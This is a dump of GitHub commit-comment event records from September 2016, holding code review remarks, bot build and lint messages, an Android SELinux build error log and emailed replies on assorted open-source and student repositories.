{"id":"4636663808","type":"CommitCommentEvent","actor":{"login":"DeepSpace2"},"repo":{"name":"AsafSH6/StyleFrame"},"payload":{"comment":{"id":19222292,"position":7,"line":230,"path":"StyleFrame/style_frame.py","commit_id":"ac883fb4043828fa23213b1558833a78bb8e89b8","created_at":"2016-09-29T11:36:15Z","updated_at":"2016-09-29T11:36:15Z","body":"Should also catch ValueError if conversation to int fails"}},"created_at":"2016-09-29T11:36:15Z"}
{"id":"4636663857","type":"CommitCommentEvent","actor":{"login":"SingaporeClouds"},"repo":{"name":"singpath/classmentors"},"payload":{"comment":{"id":19222293,"position":null,"line":null,"path":null,"commit_id":"1649029ae3952f04c325f6b884198292be2d20d0","created_at":"2016-09-29T11:36:16Z","updated_at":"2016-09-29T11:36:16Z","body":"The worker has been running as 'queue-worker'. \r\n\r\n \".write\": \"auth.uid == 'queue-worker'\"\r\n\r\nDue to Firebase 3.0 causing all tokens to expire after an hour, I will be moving workers over to run as Service accounts which I assume will have admin rights. I'm not sure if there is any mechanism in the latest Firebase version to create unique auth.uid's for server processes. \r\n"}},"created_at":"2016-09-29T11:36:16Z"}
{"id":"4636663874","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19222294,"position":null,"line":null,"path":null,"commit_id":"9db33a66704211002584043d140659343d4f4d7f","created_at":"2016-09-29T11:36:16Z","updated_at":"2016-09-29T11:36:16Z","body":"@ElbertoOne There was already a [LTC test](http://tests.stockfishchess.org/tests/view/57d476ff0ebc59030fbe5199) with linear coefficient 6. Both LTC tests (coeff 6 and coeff 10) have shown very similar results, so I see no point in doing a LTC test for coeff 8 too. I will try something differerent..."}},"created_at":"2016-09-29T11:36:16Z"}
{"id":"4636666677","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.server"},"payload":{"comment":{"id":19222300,"position":null,"line":null,"path":null,"commit_id":"b9855295b5f13b8bbcc8c77d8c9e1b035c92826f","created_at":"2016-09-29T11:36:53Z","updated_at":"2016-09-29T11:36:53Z","body":"Ramon Navarro Bosch your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-29T11:36:53Z"}
{"id":"4636672161","type":"CommitCommentEvent","actor":{"login":"fwhem"},"repo":{"name":"BenzoRoms/vendor_addons"},"payload":{"comment":{"id":19222311,"position":null,"line":null,"path":null,"commit_id":"615cd8f5e8e60098354383d31840ac6911b23eed","created_at":"2016-09-29T11:38:11Z","updated_at":"2016-09-29T11:38:11Z","body":"Jason does this apk work w/ both systemless phh and systemless supersu  w/o any special rom patches??? "}},"created_at":"2016-09-29T11:38:11Z"}
{"id":"4636672534","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"jacob4684/Polymorphism"},"payload":{"comment":{"id":19222313,"position":14,"line":14,"path":"PersonPolymorphism/Person.cs","commit_id":"4d4c5e9f3505b16af05b633be19e91732626984f","created_at":"2016-09-29T11:38:16Z","updated_at":"2016-09-29T11:38:16Z","body":"Ups - s? er UML diagrammet ikke helt korrekt.\nM?ske du selv kan udlede hvilken datatype der passer bedst?\n\n\nVenlig hilsen\nMads Mikkel Rasmussen\nLaerer\n\n________________________________\n\n\n\nBoulevarden 19 G\n7100 Vejle\n\n\n\n[cid:image003.jpg@01D0F50E.E08DC8C0]\n\n\n\nDirekte:\nTelefon:\nE-mail:\nHjemmesider:\n\n+45 28 68 74 56<tel:+45%2028%2068%2074%2056>\n+45 33 34 49 01<tel:+45%2033%2034%2049%2001>\nmara@aspit.dk<mailto:ahm@aspit.dk>\naspit.dk<http://www.aspit.dk/>, campusvejle.dk<http://www.campusvejle.dk/>, aspin.dk<http://www.aspin.dk/>\n\n\n________________________________\n\n\n\n\nTilmeld dig vores nyhedsbrev - her.<http://www.aspit.dk/om-aspit/tilmeld-nyhedsbrev/>\n\n\nDen 29. sep. 2016 kl. 13.35 skrev jacob4684 <notifications@github.com<mailto:notifications@github.com>>:\n\n\nhvad skal den vaere den har ikke nogen type?\n\n-\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub<https://github.com/jacob4684/Polymorphism/commit/4d4c5e9f3505b16af05b633be19e91732626984f#commitcomment-19222284>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AP8bSnGlNXsJ1Uvdw8YNhiWJK_2gIfsPks5qu6KAgaJpZM4KJxJV>.\n"}},"created_at":"2016-09-29T11:38:16Z"}
{"id":"4636673276","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/kazanr"},"payload":{"comment":{"id":19222316,"position":null,"line":null,"path":null,"commit_id":"bd3ac2be132b4a7583ea3d9ed2d37037170f890b","created_at":"2016-09-29T11:38:26Z","updated_at":"2016-09-29T11:38:26Z","body":"[R/do_magic.R:6:1:](https://github.com/richelbilderbeek/kazanr/blob/bd3ac2be132b4a7583ea3d9ed2d37037170f890b/R/do_magic.R#L6) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/do_magic.R:10:7:](https://github.com/richelbilderbeek/kazanr/blob/bd3ac2be132b4a7583ea3d9ed2d37037170f890b/R/do_magic.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​  out = x * 2;\n      ^\n```\n[R/do_magic.R:11:7:](https://github.com/richelbilderbeek/kazanr/blob/bd3ac2be132b4a7583ea3d9ed2d37037170f890b/R/do_magic.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​  out = replace(out, out == 84, 42);\n      ^\n```"}},"created_at":"2016-09-29T11:38:26Z"}
{"id":"4636677619","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19222324,"position":68,"line":68,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/BaseMatcher.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-29T11:39:29Z","updated_at":"2016-09-29T11:39:29Z","body":"Ok, you win ;-) I'll change it to using plain boolean ..."}},"created_at":"2016-09-29T11:39:29Z"}
{"id":"4636678838","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19222327,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T11:39:48Z","updated_at":"2016-09-29T11:39:48Z","body":"hey mate ... while trying to build cm14 with their files \r\ni get those errors:\r\nAILED: /bin/bash -c \"(/home/side/android/cm14/out/host/linux-x86/bin/checkpolicy -M -c 30 -o /home/side/android/cm14/out/target/product/jflte/obj/ETC/sepolicy_intermediates/sepolicy.tmp /home/side/android/cm14/out/target/product/jflte/obj/ETC/sepolicy_intermediates/policy.conf ) && (/home/side/android/cm14/out/host/linux-x86/bin/checkpolicy -M -c 30 -o /home/side/android/cm14/out/target/product/jflte/obj/ETC/sepolicy_intermediates//sepolicy.dontaudit /home/side/android/cm14/out/target/product/jflte/obj/ETC/sepolicy_intermediates/policy.conf.dontaudit ) && (/home/side/android/cm14/out/host/linux-x86/bin/sepolicy-analyze /home/side/android/cm14/out/target/product/jflte/obj/ETC/sepolicy_intermediates/sepolicy.tmp permissive > /home/side/android/cm14/out/target/product/jflte/obj/ETC/sepolicy_intermediates/sepolicy.permissivedomains ) && (if [ \\\"userdebug\\\" = \\\"user\\\" -a -s /home/side/android/cm14/out/target/product/jflte/obj/ETC/sepolicy_intermediates/sepolicy.permissivedomains ]; then \t\techo \\\"==========\\\" 1>&2; echo \\\"ERROR: permissive domains not allowed in user builds\\\" 1>&2; \t\techo \\\"List of invalid domains:\\\" 1>&2; \t\tcat /home/side/android/cm14/out/target/product/jflte/obj/ETC/sepolicy_intermediates/sepolicy.permissivedomains 1>&2; \t\texit 1; \t\tfi ) && (mv /home/side/android/cm14/out/target/product/jflte/obj/ETC/sepolicy_intermediates/sepolicy.tmp /home/side/android/cm14/out/target/product/jflte/obj/ETC/sepolicy_intermediates/sepolicy )\"\r\nlibsepol.report_failure: neverallow on line 574 of system/sepolicy/system_server.te (or line 18437 of policy.conf) violated by allow system_server system_server:process { execmem };\r\nlibsepol.report_failure: neverallow on line 30 of system/sepolicy/gatekeeperd.te (or line 10634 of policy.conf) violated by allow kernel gatekeeper_service:service_manager { add };\r\nlibsepol.report_failure: neverallow on line 531 of system/sepolicy/domain.te (or line 9240 of policy.conf) violated by allow mediaserver shell_data_file:dir { search };\r\nlibsepol.report_failure: neverallow on line 448 of system/sepolicy/domain.te (or line 9157 of policy.conf) violated by allow mediaserver system_file:file { execmod };\r\nlibsepol.report_failure: neverallow on line 448 of system/sepolicy/domain.te (or line 9157 of policy.conf) violated by allow mm-qcamerad system_file:file { execmod };\r\nlibsepol.report_failure: neverallow on line 448 of system/sepolicy/domain.te (or line 9157 of policy.conf) violated by allow system_server system_file:file { execmod };\r\nlibsepol.report_failure: neverallow on line 439 of system/sepolicy/domain.te (or line 9148 of policy.conf) violated by allow mediaserver system_file:file { execmod };\r\nlibsepol.report_failure: neverallow on line 439 of system/sepolicy/domain.te (or line 9148 of policy.conf) violated by allow mm-qcamerad system_file:file { execmod };\r\nlibsepol.report_failure: neverallow on line 439 of system/sepolicy/domain.te (or line 9148 of policy.conf) violated by allow system_server system_file:file { execmod };\r\nlibsepol.check_assertions: 9 neverallow failures occurred\r\nError while expanding policy\r\n\r\n\r\nany chance to know what it is :/ sorry for buggin u "}},"created_at":"2016-09-29T11:39:48Z"}
{"id":"4636685882","type":"CommitCommentEvent","actor":{"login":"mAiNiNfEcTiOn"},"repo":{"name":"evanw/node-source-map-support"},"payload":{"comment":{"id":19222336,"position":5,"line":33,"path":"source-map-support.js","commit_id":"f6427b9ec70e066900bb30708f3735ff6bcf1e50","created_at":"2016-09-29T11:41:26Z","updated_at":"2016-09-29T11:41:26Z","body":"@LinusU what this does is:\r\n\r\n_does the window have require_ *AND* _does the window have module_ *AND* _does the window have process_ *AND* _does the window.process.type is 'renderer'_\r\n\r\nthen, negates it... So basically anything that doesn't meet *one* of those conditions and has a window and XMLHttpRequest declared, it will be considered a browser.\r\n\r\nIMHO, if I am running unit tests on a CLI where I am using JSDom (which declares `window`and `XMLHttpRequest`, I don't want my source maps to be loaded via XHR.\r\n\r\nSo as a hack, I had to meet all these 3 conditions so that no XHR is executed on my tests.\r\n\r\n\\#justSaying."}},"created_at":"2016-09-29T11:41:26Z"}
{"id":"4636690324","type":"CommitCommentEvent","actor":{"login":"prokoudine"},"repo":{"name":"Ardour/ardour"},"payload":{"comment":{"id":19222370,"position":null,"line":null,"path":null,"commit_id":"fd1e5da4af70197b1aa7b965bfe5ad0671d50ee6","created_at":"2016-09-29T11:42:29Z","updated_at":"2016-09-29T11:42:29Z","body":"Translating 'Mute as 'Заглушить' is not the best option here. Here is my reasoning:\r\n\r\n1. This is a button's caption, it should be as short as possible.\r\n2. 'Молча' starts with the same letter as 'Mute', and once it's shortened to just one letter, 'M' is way more recognizable than 'З'."}},"created_at":"2016-09-29T11:42:29Z"}
{"id":"4636690924","type":"CommitCommentEvent","actor":{"login":"wwwlicious"},"repo":{"name":"ServiceStack/ServiceStack"},"payload":{"comment":{"id":19222377,"position":4,"line":4,"path":"NuGet/ServiceStack.Wire/servicestack.wire.nuspec","commit_id":"515ad9512471b1040695d09495fe96e404772577","created_at":"2016-09-29T11:42:36Z","updated_at":"2016-09-29T11:42:36Z","body":"copy paste omission ;)"}},"created_at":"2016-09-29T11:42:36Z"}
{"id":"4636691137","type":"CommitCommentEvent","actor":{"login":"SindreNordbo"},"repo":{"name":"difi/sikker-digital-post-klient-dotnet"},"payload":{"comment":{"id":19222380,"position":null,"line":null,"path":null,"commit_id":"63e7f87d12034638ffa2d389cf97363f7cd08f28","created_at":"2016-09-29T11:42:39Z","updated_at":"2016-09-29T11:42:39Z","body":"👏 "}},"created_at":"2016-09-29T11:42:39Z"}
{"id":"4636692600","type":"CommitCommentEvent","actor":{"login":"toBella123"},"repo":{"name":"toBella123/first_demo"},"payload":{"comment":{"id":19222401,"position":null,"line":null,"path":null,"commit_id":"e7b3e922ad81c31398a29d0918cef7b35d234a49","created_at":"2016-09-29T11:42:59Z","updated_at":"2016-09-29T11:42:59Z","body":"`console.log(1);```"}},"created_at":"2016-09-29T11:42:59Z"}
{"id":"4636695187","type":"CommitCommentEvent","actor":{"login":"soend"},"repo":{"name":"topkecleon/otouto"},"payload":{"comment":{"id":19222434,"position":null,"line":null,"path":null,"commit_id":"331510694f20b28276f553a0d714c9ed4e3b659d","created_at":"2016-09-29T11:43:35Z","updated_at":"2016-09-29T11:43:35Z","body":"This new send_message functions does not work.. had to revert back to the old function what was used before this commit."}},"created_at":"2016-09-29T11:43:35Z"}
{"id":"4636696827","type":"CommitCommentEvent","actor":{"login":"friedrichatgc"},"repo":{"name":"mbsim-env/mbsim"},"payload":{"comment":{"id":19222439,"position":null,"line":null,"path":null,"commit_id":"657aba9851d6bac898344e8a0db2f5b90478cb84","created_at":"2016-09-29T11:43:59Z","updated_at":"2016-09-29T11:43:59Z","body":"Just do not use \"MBS.mbsimprj.xml\" as filename for such examples. See \"runexamples.py -h\" for the mapping of filenames to examples types (xml, flatxml, source or FMI). Directories without such a filename are just skipped."}},"created_at":"2016-09-29T11:43:59Z"}
{"id":"4636700532","type":"CommitCommentEvent","actor":{"login":"gfacciol"},"repo":{"name":"gfacciol/homebrew-keckcaves"},"payload":{"comment":{"id":19222446,"position":null,"line":null,"path":null,"commit_id":"4b8c8eb91d18075b7542497674119370bfdc1e91","created_at":"2016-09-29T11:44:51Z","updated_at":"2016-09-29T11:44:51Z","body":"While the pull request is not merged, I think that you could use:\r\n\r\nbrew tap gfacciol/homebrew-keckcaves\r\nbrew install gfacciol/homebrew-keckcaves/vrui\r\nbrew install gfacciol/homebrew-keckcaves/lidarviewer\r\n"}},"created_at":"2016-09-29T11:44:51Z"}
{"id":"4636702211","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19222450,"position":48,"line":582,"path":"cura/Settings/MachineManager.py","commit_id":"bfa92b6b400ef257421d311d9739e964f1f69692","created_at":"2016-09-29T11:45:14Z","updated_at":"2016-09-29T11:45:14Z","body":"We should also revisit the \"preferred_quality\" metadata entry in fdmprinter.def.json to see if we could use that here."}},"created_at":"2016-09-29T11:45:14Z"}
{"id":"4636702803","type":"CommitCommentEvent","actor":{"login":"toBella123"},"repo":{"name":"toBella123/first_demo"},"payload":{"comment":{"id":19222451,"position":null,"line":null,"path":null,"commit_id":"e7b3e922ad81c31398a29d0918cef7b35d234a49","created_at":"2016-09-29T11:45:23Z","updated_at":"2016-09-29T11:45:23Z","body":"ssfd"}},"created_at":"2016-09-29T11:45:23Z"}
{"id":"4636703731","type":"CommitCommentEvent","actor":{"login":"cuBblu"},"repo":{"name":"jaydenxiao2016/HighLightGuideView"},"payload":{"comment":{"id":19222452,"position":null,"line":null,"path":null,"commit_id":"679e53f4193f11b4b528ebd066e815cb7d473300","created_at":"2016-09-29T11:45:36Z","updated_at":"2016-09-29T11:45:36Z","body":"679e53f"}},"created_at":"2016-09-29T11:45:36Z"}
{"id":"4636706979","type":"CommitCommentEvent","actor":{"login":"ThreeFive-O"},"repo":{"name":"Microsoft/UWPCommunityToolkit"},"payload":{"comment":{"id":19222457,"position":null,"line":null,"path":null,"commit_id":"c5b2742c49a4922ca625060af0f69ef1afc43b7a","created_at":"2016-09-29T11:46:22Z","updated_at":"2016-09-29T11:46:22Z","body":"Name change to \"Settings Storage\" breaks await _currentSample.GetCSharpSourceAsync() in Shell.xaml.cs [Line 106].\r\n"}},"created_at":"2016-09-29T11:46:22Z"}
{"id":"4636708038","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":19222461,"position":17,"line":167,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/ColorLegend/Controls/ColorLegend.cs","commit_id":"4c8c805d0de510a9a7e6115038dc7c83f1a30816","created_at":"2016-09-29T11:46:35Z","updated_at":"2016-09-29T11:46:35Z","body":"Because that's the name that will be used to register the dependency properties. It's bad to use a different name for the registrations than the wrappers."}},"created_at":"2016-09-29T11:46:35Z"}
{"id":"4636708458","type":"CommitCommentEvent","actor":{"login":"cuBblu"},"repo":{"name":"jaydenxiao2016/HighLightGuideView"},"payload":{"comment":{"id":19222463,"position":null,"line":null,"path":null,"commit_id":"960d26af9f65649bed3721d48559da38d8bb4049","created_at":"2016-09-29T11:46:40Z","updated_at":"2016-09-29T11:46:40Z","body":"960d26a"}},"created_at":"2016-09-29T11:46:40Z"}
{"id":"4636708996","type":"CommitCommentEvent","actor":{"login":"dirvine"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19222464,"position":50,"line":50,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-29T11:46:48Z","updated_at":"2016-09-29T11:46:48Z","body":"Ah when the chain is locked though in that block (so perhaps best to say a block is locked) then the previously used keys become useless. Until a block is locked they can possibly be reused to publish a fake chain (if folks accept it of course). \r\n\r\nSo locked blocks are then similar to a blockchain, where the data blocks are similar to transactions. The difference being the keys become locked out as they cannot recreate that block, If they create a new fake block then the later blocks invalidate that fake one as the newer blocks (further up the tree) know the hash of that checkpoint (it's used to compute the new block as a start position)."}},"created_at":"2016-09-29T11:46:48Z"}
{"id":"4636709721","type":"CommitCommentEvent","actor":{"login":"cuBblu"},"repo":{"name":"jaydenxiao2016/HighLightGuideView"},"payload":{"comment":{"id":19222466,"position":null,"line":null,"path":null,"commit_id":"960d26af9f65649bed3721d48559da38d8bb4049","created_at":"2016-09-29T11:46:57Z","updated_at":"2016-09-29T11:46:57Z","body":"960d26a"}},"created_at":"2016-09-29T11:46:57Z"}
{"id":"4636711181","type":"CommitCommentEvent","actor":{"login":"toBella123"},"repo":{"name":"toBella123/first_demo"},"payload":{"comment":{"id":19222472,"position":null,"line":null,"path":null,"commit_id":"e7b3e922ad81c31398a29d0918cef7b35d234a49","created_at":"2016-09-29T11:47:18Z","updated_at":"2016-09-29T11:47:18Z","body":"asf"}},"created_at":"2016-09-29T11:47:18Z"}
{"id":"4636713491","type":"CommitCommentEvent","actor":{"login":"cuBblu"},"repo":{"name":"jaydenxiao2016/HighLightGuideView"},"payload":{"comment":{"id":19222478,"position":1,"line":1,"path":"README.md","commit_id":"960d26af9f65649bed3721d48559da38d8bb4049","created_at":"2016-09-29T11:47:51Z","updated_at":"2016-09-29T11:47:51Z","body":"HighLightGuideView"}},"created_at":"2016-09-29T11:47:51Z"}
{"id":"4636713669","type":"CommitCommentEvent","actor":{"login":"toBella123"},"repo":{"name":"toBella123/first_demo"},"payload":{"comment":{"id":19222479,"position":null,"line":null,"path":null,"commit_id":"e7b3e922ad81c31398a29d0918cef7b35d234a49","created_at":"2016-09-29T11:47:54Z","updated_at":"2016-09-29T11:47:54Z","body":"af"}},"created_at":"2016-09-29T11:47:54Z"}
{"id":"4636714486","type":"CommitCommentEvent","actor":{"login":"nerdyrasa"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":19222480,"position":null,"line":null,"path":null,"commit_id":"acb8c0a0a27255e3f0af85ab2f687e0e9b82b6db","created_at":"2016-09-29T11:48:05Z","updated_at":"2016-09-29T11:48:05Z","body":"In movies controller, you are passing a list, so you need to update the model in the view to expect a list and not randommovieviewmodel. The very first line in your movies/index.cshtml should be\r\n\r\n@model IEnumerable<ShoppingCart.Models.Movie>\r\n\r\n"}},"created_at":"2016-09-29T11:48:05Z"}
{"id":"4636714588","type":"CommitCommentEvent","actor":{"login":"titi51"},"repo":{"name":"Diaoul/subliminal"},"payload":{"comment":{"id":19222481,"position":null,"line":null,"path":null,"commit_id":"7c9ae3426db5370494b1639766fff84f65876b0c","created_at":"2016-09-29T11:48:07Z","updated_at":"2016-09-29T11:48:07Z","body":"Thank you. I appreciate that. :)"}},"created_at":"2016-09-29T11:48:07Z"}
{"id":"4636717167","type":"CommitCommentEvent","actor":{"login":"Pisces000221"},"repo":{"name":"VMGroup/vocaloider"},"payload":{"comment":{"id":19222484,"position":null,"line":null,"path":null,"commit_id":"95299780a63ba607c24e2dfb06c47d8880e5ff2b","created_at":"2016-09-29T11:48:42Z","updated_at":"2016-09-29T11:48:42Z","body":":+1: "}},"created_at":"2016-09-29T11:48:42Z"}
{"id":"4636717638","type":"CommitCommentEvent","actor":{"login":"chrisface"},"repo":{"name":"notonthehighstreet/toga"},"payload":{"comment":{"id":19222485,"position":19,"line":24,"path":"src/script/preCache.js","commit_id":"563c4030a8affa6378df677c139ec800439535fe","created_at":"2016-09-29T11:48:48Z","updated_at":"2016-09-29T11:48:48Z","body":"Will we be able to render all of the components without props? Some of them could throw errors."}},"created_at":"2016-09-29T11:48:48Z"}
{"id":"4636720190","type":"CommitCommentEvent","actor":{"login":"marcbachmann"},"repo":{"name":"upfrontIO/livingdocs-docker"},"payload":{"comment":{"id":19222489,"position":4,"line":15,"path":"deploy/docker-compose.yml","commit_id":"d62070cb2e8edb25456365af17dccfa466f517d4","created_at":"2016-09-29T11:49:23Z","updated_at":"2016-09-29T11:49:23Z","body":"Yes, I can see that because it's set as `db__database`. But the variable name tells me different."}},"created_at":"2016-09-29T11:49:23Z"}
{"id":"4636721082","type":"CommitCommentEvent","actor":{"login":"23Skidoo"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":19222491,"position":null,"line":null,"path":null,"commit_id":"0c99981f1d1a4ddf9bb3d57f2d6cf371e125df40","created_at":"2016-09-29T11:49:34Z","updated_at":"2016-09-29T11:49:34Z","body":"If it's because the solver does additional checks with `-fno-ignore-asserts`, then I'd say it's still the right default for developers to use."}},"created_at":"2016-09-29T11:49:34Z"}
{"id":"4636721967","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19222496,"position":null,"line":null,"path":null,"commit_id":"2f40d97ec22e47e6b186a1cfa8e76cba3c4cc6bd","created_at":"2016-09-29T11:49:47Z","updated_at":"2016-09-29T11:49:47Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 147](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1265&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) is now running\n"}},"created_at":"2016-09-29T11:49:47Z"}
{"id":"4636722312","type":"CommitCommentEvent","actor":{"login":"marcbachmann"},"repo":{"name":"upfrontIO/livingdocs-docker"},"payload":{"comment":{"id":19222497,"position":4,"line":15,"path":"deploy/docker-compose.yml","commit_id":"d62070cb2e8edb25456365af17dccfa466f517d4","created_at":"2016-09-29T11:49:52Z","updated_at":"2016-09-29T11:49:52Z","body":"`base_host` has nothing to do with a host. Don't name it like that."}},"created_at":"2016-09-29T11:49:52Z"}
{"id":"4636725708","type":"CommitCommentEvent","actor":{"login":"almhrahman"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":19222502,"position":null,"line":null,"path":null,"commit_id":"acb8c0a0a27255e3f0af85ab2f687e0e9b82b6db","created_at":"2016-09-29T11:50:37Z","updated_at":"2016-09-29T11:50:37Z","body":"Hi.. I resolved that.. its from wrongly calling model on index.cshtml from shared folder. So, if we calling any controller with right model name.. it requires to randommoviemodel to include.\r\n\r\nHowever its resolved ☺\r\n\r\nThanks,\r\nMubarak\r\n\r\nFrom: nerdy rasa [mailto:notifications@github.com]\r\nSent: 29 September 2016 15:48\r\nTo: mosh-hamedani/vidly-mvc-5\r\nCc: Mubarak Habeeb Rahman; Comment\r\nSubject: Re: [mosh-hamedani/vidly-mvc-5] Solution - Section 3 Exercise - Display the list of movies and their details using data in the database. (acb8c0a)\r\n\r\n\r\nIn movies controller, you are passing a list, so you need to update the model in the view to expect a list and not randommovieviewmodel. The very first line in your movies/index.cshtml should be\r\n\r\n@model<https://github.com/model> IEnumerable\r\n\r\n—\r\nYou are receiving this because you commented.\r\nReply to this email directly, view it on GitHub<https://github.com/mosh-hamedani/vidly-mvc-5/commit/acb8c0a0a27255e3f0af85ab2f687e0e9b82b6db#commitcomment-19222480>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AVc4qYXiJc4Lx3A5DGQ46MieVjSdADPPks5qu6V3gaJpZM4JGfDD>.\r\n\r\n[cid:imagec29d12.PNG@95940b8c.45a96ba5]\r\n\r\n\r\n\r\n\r\nDISCLAIMER: This email and any files transmitted with it may be confidential and contain privileged or copyright information. If you are not the intended recipient you must not copy, distribute or use this email or the information contained in it for any purpose other than to notify us of the receipt thereof, if you have received this message in error, please notify the sender immediately, and delete this email from your system. Please note that e-mails are susceptible to change, the sender shall not be liable for the improper or incomplete transmission of the information contained in this communication, nor for any delay in its receipt or damage to your system. The sender does not guarantee that this material is free from viruses or any other defects although due care has been taken to minimize the risk. Please consider your environmental responsibility before printing this e-mail\r\n\r\n\r\n"}},"created_at":"2016-09-29T11:50:37Z"}
{"id":"4636725752","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19222503,"position":null,"line":null,"path":null,"commit_id":"2f40d97ec22e47e6b186a1cfa8e76cba3c4cc6bd","created_at":"2016-09-29T11:50:38Z","updated_at":"2016-09-29T11:50:38Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 147](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1265&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:51"}},"created_at":"2016-09-29T11:50:38Z"}
{"id":"4636734105","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19222513,"position":443,"line":443,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-29T11:52:33Z","updated_at":"2016-09-29T11:52:33Z","body":"页面上的方法没有做到命名统一，比如actShowXxx和showXxx，动作类的可以都加上act前缀，查看类的都可以加上view前缀，这样阅读代码时更清晰。"}},"created_at":"2016-09-29T11:52:33Z"}
{"id":"4636734793","type":"CommitCommentEvent","actor":{"login":"Marfjeh"},"repo":{"name":"megaxlr/REVENGE.CSS"},"payload":{"comment":{"id":19222514,"position":null,"line":null,"path":null,"commit_id":"324579526dcfa015790f69ac2270adc2ccb24c3c","created_at":"2016-09-29T11:52:43Z","updated_at":"2016-09-29T11:52:43Z","body":"roflmao"}},"created_at":"2016-09-29T11:52:43Z"}
{"id":"4636734805","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19222515,"position":null,"line":null,"path":null,"commit_id":"3f9c1412f5d7713b23a7c0203a688cda6dcaeef3","created_at":"2016-09-29T11:52:43Z","updated_at":"2016-09-29T11:52:43Z","body":"@lucabrivio There are IMO 2 very important points in the function bonus = f(depth) which should be maintained :\r\n\r\n-f(1) should return 1 to guarantee the minimal granularity \r\n-f(17) should return an number very close to < 324, to guarantee that bestmoves at depth = 17 are still the last ones to have an impact to the history (on higher depths no updates should be made).\r\nOtherwise you have to adapt also the numbers in movepick.h (and rHist-formula in search.cpp) which is not so easy task, especially for the multiplier 32. This multiplier is not easy to change without loosing speed IMO, since * 32 can be translated into a simple bit-shift operation.\r\n\r\nThat what I will try next is to exactly double this limits in movepick.h and to adapt the formula with an exponent >2  and linear coefficient=10 so that f(1)=1 and f(17) get closest possible to < 648. "}},"created_at":"2016-09-29T11:52:43Z"}
{"id":"4636737508","type":"CommitCommentEvent","actor":{"login":"LinusU"},"repo":{"name":"evanw/node-source-map-support"},"payload":{"comment":{"id":19222521,"position":5,"line":33,"path":"source-map-support.js","commit_id":"f6427b9ec70e066900bb30708f3735ff6bcf1e50","created_at":"2016-09-29T11:53:19Z","updated_at":"2016-09-29T11:53:19Z","body":"I might be missing something here, but the function is called `isInBrowser`. So the negating here means that if all of those requirements is true, then it is not a browser.\r\n\r\nMaybe it would be more clear if this was added as a statement above instead:\r\n\r\n```js\r\nif (window.require && window.module && window.process && window.process.type === \"renderer\")\r\n  return false\r\n```"}},"created_at":"2016-09-29T11:53:19Z"}
{"id":"4636738295","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19222522,"position":null,"line":null,"path":null,"commit_id":"b97855297db08714f15b03b2abea40dd6d0ecebd","created_at":"2016-09-29T11:53:30Z","updated_at":"2016-09-29T11:53:30Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=36)"}},"created_at":"2016-09-29T11:53:30Z"}
